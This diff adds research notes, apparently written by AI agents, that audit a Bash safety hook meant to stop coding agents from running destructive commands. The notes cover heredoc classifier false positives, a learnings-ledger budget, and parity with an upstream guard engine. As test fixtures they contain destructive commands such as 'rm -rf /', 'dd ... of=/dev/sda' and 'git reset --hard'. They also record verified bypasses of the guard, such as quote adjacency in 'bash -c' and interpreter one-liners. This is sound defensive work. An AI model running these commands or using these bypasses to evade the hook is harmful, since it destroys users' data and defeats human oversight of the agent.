+# Research 1958 - heredoc classifier false positives (T1)
+
+Verified at HEAD 209af4609 (merge of PR #1981) on branch feat/1958-heredoc-classifier-fps, 2026-07-22.
+Sources of truth: plugins/src/base/hooks/parity-safety-net.sh (472 lines) and
+plugins/src/base/hooks/parity-safety-net-heredoc.py (417 lines). Fanned copies in
+plugins/lisa/hooks/, plugins/lisa-agy|cursor|copilot/hooks/, dist/opencode/plugin-templates/
+are byte-identical today (md5 verified). Builder edits ONLY plugins/src/base/hooks, then
+runs: bun run build:plugins (scripts/build-plugins.sh removes and re-copies from src/base -
+artifact-only edits are silently discarded), bun run check:plugins to assert sync, and
+bun run build:upstream-evidence-manifest in the SAME commit (CI stale-manifest gate).
+
+## 1. Current anchors at HEAD
+
+### block_heredoc() - parity-safety-net.sh:102-108
+Wraps block() and appends remediation UNCONDITIONALLY to every heredoc denial, commit or not:
+
+    block_heredoc() {
+      block "$1
+    Heredoc commit invocations are blocked (the payload is executable shell).
+    Fix: write the commit message to a file and run  git commit -F <file> .
+    Every commit must also carry a Co-authored-by trailer for a supported agent
+    (Claude/Codex/OpenCode) - the commit-msg hook enforces this."
+    }
+
+Scope item 3 makes this conditional: keep the commit -F text when the command contains a
+git commit invocation; otherwise recommend writing the payload to a file with the Write
+tool and executing the file. Note block() itself (lines 82-91) appends the generic
+matched-a-guard paragraph; block_heredoc adds the commit text on top.
+
+### Parser invocation protocol - parity-safety-net.sh:110-136
+- Trigger: case "$command_str" in *'<<'* (any << substring anywhere).
+- Parser resolved as $hook_dir/parity-safety-net-heredoc.py next to the hook.
+- Gate A (line 115): python3 missing or parser unreadable -> block_heredoc
+  "cannot safely classify heredoc command because its parser runtime is unavailable".
+- Gate B (line 118): printf %s(cmd+newline) | /bin/bash -n fails -> block_heredoc
+  "malformed heredoc command failed shell syntax validation".
+- Parse (line 123): printf %s "$command_str" | python3 parser, stderr discarded.
+  Protocol: RAW COMMAND ON STDIN, sanitized text (exit 0 only) on STDOUT. No argv.
+- Exit-code vocabulary (heredoc.py:11-13): SAFE=0, UNSUPPORTED=10, MALFORMED=20.
+  Hook dispatch (lines 129-134):
+    0  -> command_for_guards = parser stdout (payload STRIPPED before guards)
+    10 -> command_for_guards = raw command (payload fully visible to all guards)
+    20 -> block_heredoc "malformed or ambiguous heredoc command cannot be safely classified"
+    *  -> block_heredoc "heredoc parser failed; command was denied fail-closed"
+- ERR-trap subtlety (lines 59-66): the hook deliberately does NOT set -E because errtrace
+  would rewrite the parser exit codes to 2 inside the command substitution. Preserve.
+
+### gh allowlist path - heredoc.py:16-22, 77-98 (scope: DO NOT WIDEN)
+- ALLOWED_GROUPS = {issue, pr}; ALLOWED_ACTIONS = {create, edit, comment} (lines 21-22).
+- is_allowed_gh (77-83): tokens[0]==gh, tokens[1] in groups, tokens[2] in actions.
+- BODY_CAT_MARKER regex (16-20): the exact  --body "$(cat <<'DELIM'  header form.
+- classify_safe (119-155): the ONLY exit-0 path. Two grammars: body-cat form and the
+  direct  --body-file -  form; direct form demands raw_marker == <<'delim' exactly
+  (line 144, single quotes only), nothing after the marker on the header line, exact
+  terminator line, only whitespace after; violations inside a recognized writer raise
+  ValueError -> MALFORMED.
+
+### has_active_command_substitution - heredoc.py:296-331 (THE F1 mechanism)
+Character-level quote-state scan over the ENTIRE command string INCLUDING heredoc bodies.
+Returns True on a backtick or $( outside single quotes and outside comments. Because the
+body of a fully-quoted heredoc is literal data to bash but plain text to this scanner,
+backticks or $( inside a string literal in the payload flip the verdict.
+
+### main() decision ladder - heredoc.py:373-413 (marker-count rule at 409)
+1. No << in command -> echo unchanged, SAFE.
+2. classify_safe: ValueError -> MALFORMED; sanitized -> SAFE (gh writers only).
+3. collapse_line_continuations (235-265), top_level_markers (158-194).
+4. writer_has_commented_marker_and_following_code -> MALFORMED (282-293).
+5. writer_owns_real_marker -> MALFORMED (268-279).
+6. line 394: NO markers and NO active substitution -> UNSUPPORTED (quoted-prose operators).
+7. line 400: first line has an allowed gh writer (but failed exact grammar) -> MALFORMED.
+8. line 407: has_active_command_substitution -> MALFORMED   <- F1 dies HERE.
+9. line 409: len(markers) > 1 -> MALFORMED                  <- chained heredocs die here.
+10. line 411: single marker unclosed (marker_is_closed 363-370) -> MALFORMED.
+11. else UNSUPPORTED (raw text through guards).
+
+## 2. Parser delimiter-quoting capability today
+
+parse_marker (heredoc.py:334-360) DOES read quoting while parsing:
+- Handles <<- strip-tabs, skips whitespace, then:
+      quote = line[index] if line[index] in "..." else None
+  For a quoted delimiter it takes everything to the matching close quote (BOTH single and
+  double quotes handled identically); for unquoted it regex-matches [A-Za-z_][A-Za-z0-9_]*.
+- BUT the quoting decision is DISCARDED: Marker (25-30) stores only
+  (start, end, delimiter, strip_tabs). No quoted field survives.
+- Backslash form <<\EOF: parse_marker returns None (backslash is not a quote char and
+  the identifier regex rejects it) - the marker is INVISIBLE, no Marker is recorded.
+- Partial quoting <<EO'F': parsed as UNQUOTED delimiter "EO" (stops at the quote), which
+  mismatches the real bash delimiter EOF after quote removal -> terminator never found.
+
+The only quoting check in the file is classify_safe line 144: raw-slice equality
+header[start:end] == <<'delim' - single-quote-only, exact, gh-grammar-only.
+
+POSIX note: ANY quoting of ANY part of the delimiter (single, double, or backslash escape)
+makes the body non-expanding. What the parser can prove TODAY: fully-single-quoted (raw
+slice compare) and fully-double-quoted (parse_marker consumed a quote pair - recoverable by
+re-checking the raw slice or by extending Marker). It can NOT currently see <<\EOF at all
+and it mis-tokenizes partial quoting.
+F4 recommended conservative line: extend Marker with a quoted flag set ONLY when the whole
+delimiter token was wrapped in one quote pair (<<'EOF' or <<"EOF"); treat only that as
+non-expanding. Leave <<\EOF (invisible marker -> UNSUPPORTED -> body raw-scanned by guards,
+fail-safe) and partial quoting (terminator mismatch -> MALFORMED) exactly as they behave
+today, and document the divergence from POSIX as deliberate fail-closed conservatism.
+
+## 3. Test suite
+
+There is NO python-side unit harness anywhere in the repo (no *.py tests, no pytest);
+heredoc.py is exercised ONLY through the shell hook as a subprocess of vitest suites.
+Runner: vitest (package.json test = vitest run), jest-style globals, describe/it/it.each.
+
+- tests/unit/hooks/parity-safety-net.test.ts - MAIN heredoc coverage (lines 52-242):
+  allowed prose payloads (quoting every destructive form), the exact body-cat form,
+  executable bash/python3 quoted heredocs BLOCKED (line 77-86 - F1 currently sits in this
+  expectation set via the substitution-token path), quoted fake markers, unquoted expanding
+  heredoc, it.each fail-closed table (multiple heredocs, unclosed, trailing command, piped
+  writer, chained writer, destructive-before-writer), parser-missing/crash tempdir fixture,
+  custom-rules interplay, bash -n syntax pin.
+- tests/unit/hooks/parity-safety-net-heredoc.test.ts - adversarial grammar (89 lines):
+  quote-concatenated writers, commented markers, line continuations. runHook returns only
+  status here; the .test.ts above also captures stderr (use THAT helper style for F6
+  remediation-text assertions).
+- tests/unit/hooks/parity-safety-net-guards.test.ts - smoke pins only (HD-A1 exempt,
+  HD-B1 block); header states deep heredoc coverage lives in the two files above.
+  Uses tests/helpers/safety-net-guard-harness.ts + safety-net-guard-fixtures.ts.
+- Parity mirrors: tests/unit/agy/parity-safety-net-agy.test.ts,
+  tests/unit/opencode/parity-safety-net-plugin.test.ts.
+- Convention: HOOK_PATH = path.resolve("plugins/lisa/hooks/parity-safety-net.sh") - the
+  FANNED copy. Run bun run build:plugins after editing src/base or tests exercise stale code.
+- runHook: spawnSync(/bin/bash, [hook], stdin = JSON {tool_name: Bash, tool_input:{command}}),
+  assert status 2 (blocked) / 0 (allowed); EXIT_BLOCKED/EXIT_ALLOWED constants.
+- Placement for F1-F7: new rows in the parity-safety-net.test.ts heredoc describe (flip the
+  python3-backtick expectation, add F2 control with substitution tokens in payload, keep F3
+  in the unquoted set, F5 already covered by unclosed row); F4 partial/escaped forms fit
+  parity-safety-net-heredoc.test.ts; F6 asserts stderr content in parity-safety-net.test.ts;
+  add one HD smoke pin in guards.test.ts. If the builder wants isolated classifier tests,
+  precedent is subprocess drive: spawnSync python3 with the command on stdin asserting the
+  0/10/20 code - a new file like tests/unit/hooks/parity-safety-net-heredoc-parser.test.ts
+  would be a new (but consistent) convention.
+
+## 4. Empirical repro at HEAD 209af4609 (real hook drives, stdin JSON; parser driven directly too)
+
+| Probe | Command shape | parser exit | hook exit | message |
+|---|---|---|---|---|
+| F1 | python3 <<'EOF' ; body: s = "triple-backtick markdown triple-backtick" | 20 MALFORMED | 2 BLOCKED | malformed or ambiguous heredoc command cannot be safely classified + git commit -F text |
+| F1b | python3 <<'EOF' ; body: print("hello") - no substitution tokens | 10 UNSUPPORTED | 0 ALLOWED | - |
+| F2 | python3 <<'EOF' ; body: import os; os.system("rm -rf /") | 10 UNSUPPORTED | 2 BLOCKED | recursive forced delete of a root, home, or wildcard path (rm -rf) |
+| F3 | gh issue create --body-file - <<EOF (UNQUOTED); body: $(rm -rf /) | 20 MALFORMED | 2 BLOCKED | malformed-or-ambiguous + commit -F text |
+| F6 | git commit -m "$(cat <<'EOF' ... EOF )" | 20 MALFORMED | 2 BLOCKED | malformed-or-ambiguous + commit -F text (appropriate HERE, wrong for F1/F3) |
+| F4a | python3 <<\EOF ; harmless body | 10 UNSUPPORTED | 0 ALLOWED | marker invisible; body raw-scanned |
+| F4b | python3 <<EO'F' ; harmless body, EOF terminator | 20 MALFORMED | 2 BLOCKED | delimiter tokenized as EO, never closed |
+
+Key readings for the builder:
+- F1b proves plain quoted interpreter heredocs ALREADY pass as UNSUPPORTED. The bug is
+  narrowly: substitution TOKENS inside the quoted BODY flip UNSUPPORTED to MALFORMED at
+  main() line 407 because has_active_command_substitution scans body text. The fix is a
+  body-aware scan (exclude the single quoted-heredoc body window: lines header+1 through
+  the first exact terminator line), NOT a new exit code. Target class stays UNSUPPORTED(10)
+  so the raw payload keeps flowing to the content guards.
+- F2 proves the content-guard pass-through requirement is ALREADY satisfied for the
+  UNSUPPORTED class (hook blocked via the rm guard, not the heredoc wall). CRITICAL: the
+  F2 fixture must ALSO be run in a variant whose guarded payload contains $( or backticks
+  (e.g. $(rm -rf /) inside the quoted body) - today that variant exits 20; post-fix it must
+  exit 10 AND still be blocked by the guards. That is the bypass-proof control.
+- F3 stays MALFORMED via the same line-407 check because its marker is unquoted - the
+  body-window exclusion must apply ONLY when the single marker is provably fully quoted
+  (mutation-proofing per T2: treating unquoted as quoted must fail this fixture).
+- The bash -n gate (hook line 118) runs BEFORE the parser: truly unparseable heredocs are
+  blocked with the shell-syntax-validation message, so F5 fixtures should use shapes that
+  survive bash -n (bash -n accepts an unclosed heredoc with a warning on some bash
+  versions - verify empirically which message F5 lands on).
+
+## 5. Multi-heredoc (chained, all-quoted) feasibility - RECOMMEND OUT OF SCOPE
+
+Not a natural extension; it multiplies parse states. Specific obstacles:
+1. No body-region model exists. top_level_markers only locates marker tokens;
+   marker_is_closed (363-370) searches ALL lines after the marker line for the terminator.
+   With two markers, body one containing a line equal to delimiter two falsely closes
+   marker two (and vice versa). Correct chained parsing needs ordered body segmentation -
+   bash consumes bodies in marker order starting on the line after the header - including
+   the same-line case (cat <<'A' <<'B') and markers on different lines with commands
+   between, which is exactly the ambiguity the classifier exists to refuse.
+2. The substitution scanner would need multiple disjoint exclusion windows, one per body,
+   each dependent on correct segmentation of the previous body - errors compound.
+3. len(markers) > 1 -> MALFORMED (line 409) is a one-line rule, but every downstream
+   assumption (single terminator search, single body window for the F1 fix) is single-
+   marker. Relaxing it without a real segmentation pass invites exactly the parser-
+   soundness attacks T3 will probe (overlapping delimiters, delimiter-in-body, CRLF).
+The single-heredoc F1 fix needs exactly one body window and zero new states - cheap and
+provable. Recommendation: ship single-heredoc only; document chained as out-of-scope,
+citing the marker_is_closed cross-closure defect as the concrete blocker (it must be fixed
+before chaining could ever be sound).
+
+## 6. History and do-not-disturb list
+
+parity-safety-net.sh (all 2026-07-22 except last two):
+- 15d5ee8fb feat: conditional git rebase --abort/--quit guard (issue #1956, merged via PR #1979)
+- 29818e25f fix: pair any recursive form with any force form in rm split gate (PR #1976)
+- 8ab54c7e6 fix: close git global-option and path-prefixed rm bypasses (PR #1976)
+- f02715fa7 feat: absorb upstream safety-net 1.0.6 guards (PR #1976)
+- c0f3ee290 2026-07-19: git commit -F remediation text in heredoc denials (gardener #1789, PR #1791)
+heredoc.py: untouched since 2026-07-17 (5450387ee fail-closed #1594; 267757aee CodeRabbit fixes).
+
+MUST NOT DISTURB (fresh from #1976/#1979, under their own test pins):
+- GIT_GLOBAL_OPTS + GIT_CMD anchor (lines 160-169) and every guard built on them.
+- RM_CMD / RM_RF_CLUSTER / RM_RF_SPLIT (170-183) and the per-statement rm loop (211-280).
+- Guard 3b rebase --abort/--quit AUTO_MERGE discriminator (320-354).
+- The ERR trap WITHOUT set -E (59-66) - errtrace would destroy the parser exit-code
+  protocol the heredoc dispatch depends on.
+- Guard-2 force-push statement splitting (282-305).
+The heredoc work surface is disjoint: block_heredoc() (102-108), the dispatch case
+(110-136, only if the remediation conditional needs command_str context), and heredoc.py
+(Marker, parse_marker, has_active_command_substitution, main). No custom rules file exists
+in this checkout (.claude/safety-net-rules.txt absent), so rules-file interplay is
+covered only by the tempdir fixtures in the tests.

--- a/.lisa/research-1959.md
+++ b/.lisa/research-1959.md
@@ -1,0 +1,32 @@
+# Research: learnings-ledger-budget — CodySwannGT/lisa#1959
+(Authored by ledger-explorer T1; pasted by lead — the Explore agent had no write tool.)
+
+## 1. The two caps — definitions & enforcement sites
+Both caps live in ONE frozen contract `src/core/learnings-contract.ts:26-28`: maxProvenanceReferences 20, maxEntries 20, maxTokens 4000; measurement utf8-bytes (`estimateLearningTokens=Buffer.byteLength`, :50-52). The "4000-byte cap" IS maxTokens.
+Enforcement (all import the one contract): learnings-document.ts:62-78 assertDocumentBudget (throws on maxEntries :67-71 and maxTokens :72-77); :33 parseLearningsFile pre-check; learnings-budget-check.ts:63-97 checkLearningsBudget (CI-facing, discriminated union). Persist writer learnings-writer.ts:232,197 call assertDocumentBudget → THROW on overflow.
+Wiring: package.json:34 check:learnings-budget → scripts/check-learnings-budget.ts (default target all/create-only template, exit 1). CLI src/cli/check-learnings-budget-cmd.ts (missing file = pass). CI .github/workflows/quality.yml:626 runs the PINNED PUBLISHED bunx @codyswann/lisa@2.243.0 against THIS repo ledger — uses PUBLISHED contract (4000) until a release ships; local npm script uses LOCAL source.
+
+## 2. Persist
+persistLearningEntry delegates to persistConsolidatedLearning (writer.ts:38-43,58-90). supersede[] ids dropped in the same atomic temp+rename write under withLearningTargetLock. Budget = assertDocumentBudget at :232 THROWS on overflow — no supersede-in-place-on-overflow, no overflow sink. "No-budget drop → report text only" is SKILL-level: lisa-persist-learning/SKILL.md:176. Fix 2/3 hook that over-budget branch (agent-side; marker/ticket creation is agent-side, not code).
+
+## 3. Bytes-per-entry & derived budget
+Current ledger 3999 B / 8 entries: per-entry 377,474,563,606,520,369,599,412 → avg 490, min 369, max 606; header overhead 72 B. rule ≤240 chars/≤2 lines; why capped only at maxTokens.
+RECOMMEND: PER_ENTRY_BYTE_ALLOWANCE=600; maxTokens = maxEntries*600 = 12000. Derived (not flat) so caps can never re-diverge. Tighter alt 512→10240 (still >20×490).
+
+## 4. Gardener channel (Fix 2 — REUSE)
+Gardener lisa-learnings-audit/SKILL.md consumes the ledger via parseLearningsFile+projectLearnings (measures budget pressure = entries the projection omits) and the tracker (prior gardener tickets = memory). Reusable emission = marker-comment dedupe discipline in lisa-persist-learning/SKILL.md (drop note `<!-- [lisa-learning-drop] key=<fp> -->` :53-55, dedupe :67; general discipline :44 match-marker-not-title, one marker/body, dedupe open+closed).
+EMIT saturation signal on a budget-forced drop: ONE marker-deduped tracker signal keyed on a saturation fingerprint, fires once per saturation not per capture, suppressed while an equivalent open signal exists.
+CAVEAT (:86): gardener excludes any `[lisa-learning-*]`-marked item from candidacy. PREFER option (b): the gardener ALREADY samples budget pressure from the projection, so the signal's only job is idempotent operator-visible notification — use a marker the gardener reads as budget-pressure evidence (or outside the excluded namespace), NOT a new candidate stream.
+
+## 5. Fix 3 overflow — DEFER
+No overflow/drain pattern exists; adding one needs the atomic-temp+lock+assertSafeLearningParents machinery for a new file + a gardener drain step + 6 plugin projections + a contract test — invasive, duplicates "communicate through the tracker". Its only unique value (durable dropped CONTENT) matters only at the hard 20-entry cap. Derived budget already rescues the 9 stranded drafts (T6 dogfood). DEFER to follow-up; ship Fix 1 + Fix 2.
+
+## 6. Tests + doc
+learnings-contract.test.ts:59-61 HARD-asserts maxTokens 4000 — MUST change + assert the derivation. Also: learnings-budget-check.test.ts, learnings-writer.test.ts, scripts/check-learnings-budget.test.ts (+ -helpers.ts fixture builder: writes ad-hoc ledgers to tmp via writeFileSync/cpSync — the R1 fixture convention), cli/check-learnings-budget-cmd.test.ts, strategies/learnings-audit-contract.test.ts. Contract IS the doc; prose to sync: lisa-persist-learning/SKILL.md:176 + gardener budget-pressure wording.
+
+## 7. History
+Learnings CORE all merged (afced2789/8bd3a9482/c32ea39ac/…); nothing in flight touching caps. Ledger FILE churned by another session today (content only). Expect ledger-file merge, not code.
+
+## Headlines
+1. Derived budget maxTokens = maxEntries * 600 = 12000. Update learnings-contract.ts:26-28 + learnings-contract.test.ts:59-61.
+2. Fix 3 OUT (defer); ship Fix 1 + Fix 2 (skill-level saturation signal, option b).

--- a/.lisa/research-1960-guard-audit.md
+++ b/.lisa/research-1960-guard-audit.md
@@ -1,0 +1,134 @@
+# Research: upstream cc-safety-net 1.0.6 vs Lisa `parity-safety-net.sh` — Bash-guard parity audit (issue #1960)
+
+Plan: safety-net-guard-parity, task T1. Read-only research deliverable.
+
+## Sources & method
+
+- Upstream engine: `~/.claude/plugins/cache/cc-marketplace/safety-net/1.0.6/dist/bin/cc-safety-net.js`
+  (bundled JS, retains `// src/...` module markers). Key modules (bundle line refs):
+  - git rule table: `src/core/git/rules.ts` @ L2655
+  - rm analyzer + target classifier: `src/core/analyze/rm.ts` @ L2076
+  - flag normalizer `hasRecursiveForceFlags`: `src/core/analyze/rm-flags.ts` (L~700)
+  - interpreter/one-liner text scan `DANGEROUS_PATTERNS`: @ L683; `dangerousInText`: @ L314
+  - `SHELL_WRAPPERS` (bash/sh/zsh/ksh/dash/fish/csh/tcsh) @ L680; `INTERPRETERS` (python/python3/python2/node/ruby/perl) @ L681
+  - wrapper strip (sudo/env/command/busybox, env-assignments, `$SHELL`): `stripWrappersWithInfo` @ L1614
+  - find/xargs/parallel/awk analyzers @ L1864 / L3783 / L3430 / L386
+  - segment orchestrator (recursion ≤10, embedded-command scan): `src/core/analyze/segment.ts` @ L3970
+  - env modes: `src/core/env.ts` @ L2037; worktree relaxation: `src/core/git/worktree-relaxation.ts` @ L3239
+- Hook registration: `hooks/hooks.json` (PreToolUse matcher `Bash` → `node dist/bin/cc-safety-net.js hook --claude-code`).
+- Upstream README: `.../1.0.6/README.md` (capability table L157-168, modes table L174-184).
+- Every verdict below was **empirically verified** with the upstream trace CLI
+  (`node dist/bin/cc-safety-net.js explain [--json] "<cmd>"`) and Lisa's hook was driven with fake
+  PreToolUse payloads (`{"tool_name":"Bash","tool_input":{"command":...}} | bash parity-safety-net.sh`),
+  run from `/Users/cody/workspace/lisa`.
+- Lisa hook: `plugins/src/base/hooks/parity-safety-net.sh` (guards 1-4 at L97-152, custom-rules L154-165,
+  heredoc fail-closed classifier L65-91). Skill doc: `plugins/src/base/skills/lisa-parity-safety-net-rules/SKILL.md`.
+  Component inventory: `parity/plugin-routing/safety-net@cc-marketplace.md` (pinned at 0.9.0; cache now holds 1.0.6).
+
+### How upstream works (why naive-regex bypasses fail against it)
+
+Upstream is a **semantic engine**, not a grep: it shell-parses the command, splits into segments
+(`;`, `&&`, `||`, `|`, newlines), strips wrapper prefixes (`sudo`, `env`, `command`, `busybox`,
+leading `VAR=x` assignments), recurses into `bash|sh|zsh|ksh|dash|fish|csh|tcsh -c '...'` (≤10 deep)
+and into `find -exec`, `xargs`, `parallel`, `awk system()`, and interpreter `-c/-e` code args, then
+runs per-command analyzers (`git`, `rm`, `find`, `xargs`, `parallel`). It tracks `cd` to know the
+effective cwd for the rm policy. Unknown head commands get an *embedded-token scan* (each argv token
+checked against the git/rm/find analyzers) unless the head is a known display command (`echo`, `cat`,
+`grep`, `rg`, ... — `DISPLAY_COMMANDS` @ L14118-region).
+
+## Master classification table (upstream default-mode guards)
+
+Verdicts: verified via `explain` (upstream) and live hook run (Lisa). "Lisa hook today" refers to
+`parity-safety-net.sh` built-ins 1-4.
+
+| # | upstream guard | example blocked (verified) | example near-miss allowed (verified) | Lisa hook today | classification |
+|---|---|---|---|---|---|
+| 1 | `git checkout -- <path>` | `git checkout -- file.ts` | `git checkout -b feature` | allows (verified) | material-absorb |
+| 2 | `git checkout <ref> -- <path>` | `git checkout main -- src/app.ts` | `git checkout main` | allows | material-absorb |
+| 3 | `git checkout -f/--force` | `git checkout -f main` | `git checkout main` | allows | material-absorb |
+| 4 | `git checkout --pathspec-from-file` | `git checkout --pathspec-from-file=list` | — | allows | material-absorb (bundle with #1) |
+| 5 | `git checkout` ≥2 positional args (ambiguous overwrite) | `git checkout feature file.ts` | **`git checkout .` is ALLOWED upstream** (single positional; L2655 `positionalArgs.length >= 2`) | allows both | material-absorb — and exceed upstream by blocking `git checkout .` (issue #1960 names it; it discards the whole tree) |
+| 6 | `git switch --discard-changes` / `-f` | `git switch --discard-changes main`, `git switch -f main` | `git switch main` | allows | material-absorb |
+| 7 | `git restore` without `--staged` (`--worktree` always) | `git restore file.ts`, `git restore --worktree f` | `git restore --staged file.ts` | allows | material-absorb |
+| 8 | `git reset --hard` (unconditional) | `git reset --hard`, `git reset --hard HEAD~1` | `git reset --soft HEAD~1`, `--keep` | **partial**: blocks only on dirty tree (guard 3, L141-146) | already-covered (deliberate divergence: Lisa allows clean-tree resets — keep, but see false-negative note F3) |
+| 9 | `git reset --merge` | `git reset --merge` | `git reset --soft` | allows | material-absorb (add to guard 3 with same dirty-tree condition) |
+| 10 | `git clean -f` (unless `-n`/`--dry-run`) | `git clean -f`, `git clean -fd` | `git clean -n` | allows | material-absorb |
+| 11 | `git push --force` / `-f` on **any** branch | `git push -f origin feature-x` | `git push --force-with-lease origin main` | **partial**: protected branches only (guard 2, L127-136) — `git push --force origin dev` allowed | deliberately-skip full-parity (feature-branch force-push is a sanctioned agent workflow — rebase-and-push; Lisa's protected-branch scoping is an intentional design; document it) |
+| 12 | `git branch -D` (delete+force; also `-d -f`) | `git branch -D feature-x`, `git branch -df x` | `git branch -d feature-x` (safe delete) | allows | material-absorb |
+| 13 | `git stash drop` / `clear` | `git stash clear`, `git stash drop stash@{0}` | `git stash push`, `git stash pop` | allows | material-absorb |
+| 14 | `git worktree remove --force` | `git worktree remove --force wt` | `git worktree remove wt` | allows | material-absorb |
+| 15 | `git rebase --abort` | `git rebase --abort` | `git rebase main` | allows | deliberately-skip (standard agent bail-out from a conflicted rebase; blocking it strands agents mid-rebase; discards only in-progress conflict edits) |
+| 16 | `git merge --abort` | `git merge --abort` | `git merge main` | allows | deliberately-skip (same rationale as #15) |
+| 17 | `git tag -d` | `git tag -d v1.0.0` | `git tag v1.0.0` | allows | material-absorb (cheap ERE) |
+| 18 | `git reflog delete` | `git reflog delete HEAD@{1}` | `git reflog expire --expire=now --all` (allowed upstream!) | allows | material-absorb (cheap ERE) |
+| 19 | `rm -rf` on root/home | `rm -rf /`, `/*`, `~`, `~/`, `$HOME` | `rm -rf /tmp/x` (temp allowance) | **blocks** (guard 1) — verified all forms | already-covered |
+| 20 | flag-order/cluster normalization | `rm -r -f /`, `rm -fr ~`, `rm --recursive --force /` | `rm -r dir` (no force), `rm -f file` (no recursive) | **blocks** — verified `-r -f`, `-fr`, long-flag forms | already-covered |
+| 21 | `rm -rf .` / `./` (cwd self-delete) | `rm -rf .`, `rm -rf ./` (upstream `cwd_self_target`, L2076) | `rm -rf ./build` | allows (verified) | material-absorb (issue #1960 names it) |
+| 22 | `rm -rf` outside cwd | `rm -rf ../other`, `rm -rf /Users/x/other-project` | `rm -rf build`, `rm -rf /tmp/x` | allows | material-absorb (block `..`-traversal targets and absolute targets outside `${CLAUDE_PROJECT_DIR:-$PWD}` minus /tmp, /var/tmp, $TMPDIR — bash can do prefix checks) |
+| 23 | `rm -rf $VAR` (dynamic target) | `rm -rf $DIR` | `rm -rf $TMPDIR/x`, `${TMPDIR}` (temp-var allowance) | allows | material-absorb |
+| 24 | `rm -rf` when **cwd is $HOME** | any `rm -rf x` run with cwd=$HOME | same cmd in a project dir | allows | material-absorb (one-line `[ "$PWD" = "$HOME" ]` gate inside guard 1) |
+| 25 | wrapper recursion: `bash|sh|zsh|... -c '...'` | `bash -c "rm -rf ~"`, `sh -c "git reset --hard"`, `sh -c "bash -c '...'"` (nested) | `bash -c "rm -rf build"` | **partial**: raw-text grep catches many, but quote-adjacency defeats guard 1's target regex — `bash -c "rm -rf /"` ALLOWED by Lisa (verified; `/` followed by `"` fails `([[:space:]]|/?\*?$)`) | material-absorb via quote-aware boundary fix (see F1) — no engine needed |
+| 26 | interpreter one-liners, default mode: `python|python3|python2|node|ruby|perl -c/-e` code arg scanned against `DANGEROUS_PATTERNS` (rm-rf, git reset --hard, git checkout --, git clean -f, git stash drop/clear, `dd ...of=/dev/*`, `mkfs* /dev/*`, `shred`, `find -delete`) + nested shell analysis | `python -c "import os; os.system('rm -rf /')"`, `node -e "...execSync('git reset --hard')"`, `perl -e "system('rm -rf /')"`, `ruby -e "system('git stash clear')"`, `python -c "...os.system('dd if=/dev/zero of=/dev/sda')"` | `python -c "print(1)"`, `python spider.py -c config.yaml` (no code arg), **`python3 -c "import shutil; shutil.rmtree('/')" is ALLOWED upstream** (no shell text — API calls invisible) | **partial**: raw grep sees the text but quote-adjacency again defeats target match — `os.system('rm -rf /')` ALLOWED by Lisa (verified) | material-absorb via same quote-boundary fix (F1). This is DEFAULT-mode upstream behavior, not paranoid — do not confuse with #35 |
+| 27 | `find ... -delete` | `find . -delete`, `find . -name '*.tmp' -delete` | `find /tmp -name x -exec rm {} +` (non-recursive child), `echo "find -delete"` (display-command skip) | allows | material-absorb |
+| 28 | `find -exec rm -rf` | `find . -name x -exec rm -rf {} \;` | `find . -exec cat {} \;` | allows (target `{}` is not catastrophic, so guard 1 target-check fails) | material-absorb |
+| 29 | `xargs rm -rf` (dynamic input) | `xargs rm -rf`, `echo /some/dir \| xargs rm -rf`, `cat list.txt \| xargs rm -rf` | `xargs grep pattern` | allows | material-absorb |
+| 30 | `xargs <shell> -c` (arbitrary exec from dynamic input) | `xargs sh -c '...'` | — | allows | deliberately-skip (needs child-command analysis; low marginal value once #29 + F1 land) |
+| 31 | GNU `parallel` child analysis | `parallel rm -rf {} :::: files.txt` | `parallel rm -rf ::: a b` (static arg list — ALLOWED upstream) | allows | deliberately-skip (distinguishing static `:::` vs file/stdin input sources is not expressible as a grep; rare in agent workflows) |
+| 32 | `awk 'BEGIN{system("...")}'` child analysis (+ dynamic-system fail-closed) | `awk 'BEGIN{system("rm -rf /")}'` | `awk '{print}'` | allows | deliberately-skip (requires awk-code parsing; F1 quote fix incidentally catches the literal-string case above) |
+| 33 | wrapper-prefix stripping (`sudo`, `env VAR=x`, `command`, `busybox`) | `sudo rm -rf /`, `env FOO=1 rm -rf ~`, `busybox rm -rf ~` | `sudo apt install x` | **blocks** (raw-text grep is prefix-agnostic — verified all three) | already-covered (incidental) |
+| 34 | strict mode: block unparseable commands (`CC_SAFETY_NET_STRICT=1`) | (opt-in) | — | heredoc path already fails closed on ambiguity (L65-91) | deliberately-skip (paranoid/strict opt-in upstream; Lisa's fail-closed heredoc classifier covers the analogous risk) |
+| 35 | PARANOID_RM: block `rm -rf` even within cwd (`CC_SAFETY_NET_PARANOID_RM=1`) | `rm -rf build` (paranoid only) | same cmd default-allowed | allows | deliberately-skip (opt-in-only upstream; Lisa operators can add a one-line ERE `rm .*-r` rule via the rules file if a project wants it) |
+| 36 | PARANOID_INTERPRETERS: block ALL interpreter one-liners (`CC_SAFETY_NET_PARANOID_INTERPRETERS=1`) | `python -c "print(1)"` (paranoid only) | — | allows | deliberately-skip (opt-in-only upstream; would break routine agent one-liners; rules-file escape hatch exists) |
+| 37 | worktree mode: RELAX local git discards in verified linked worktrees (`CC_SAFETY_NET_WORKTREE=1`) | n/a (a relaxation, not a guard) | — | n/a | deliberately-skip (requires stateful worktree verification; Lisa has no discard guards to relax yet — revisit only after absorbing #1-#10) |
+| 38 | custom rules: JSON rulebooks, SHA-256-pinned GitHub sources, `rule sync` CLI | — | — | ERE-lines file (`.claude/safety-net-rules.txt`) | deliberately-skip (documented Lisa design decision — SKILL.md L16-30: no npx dependency, auditable flat file, cross-agent) |
+| 39 | audit log `~/.cc-safety-net/logs/<session>.jsonl` with secret redaction | — | — | none (reason surfaced to agent via stderr) | deliberately-skip (no log-sink infra; block reason already reaches agent + user; revisit if forensics ever needed) |
+| 40 | fail-closed on malformed hook input / invalid config | malformed JSON → deny | — | partial: `set -euo pipefail` makes jq failures exit non-zero, but a non-2 exit is a NON-blocking error in Claude Code | material-absorb (tiny: trap ERR → exit 2 so parse failures deny instead of warn) |
+
+### Upstream surprises worth knowing (verified)
+
+- `git checkout .` is **allowed** upstream (single positional arg). Issue #1960 asks for it — absorbing it means *exceeding* upstream.
+- `rm -rf *` (unexpanded glob) is **allowed** upstream (resolves within cwd). **Lisa blocks it** (guard 1 wildcard target) — Lisa is stricter here; keep.
+- Top-level `dd if=/dev/zero of=/dev/sda`, `mkfs.ext4 /dev/sda1`, `shred file.txt` are **allowed** upstream — those patterns exist only inside the interpreter-code text scan (L683). Absorbing them as always-on top-level EREs exceeds upstream at trivial cost (see absorb list).
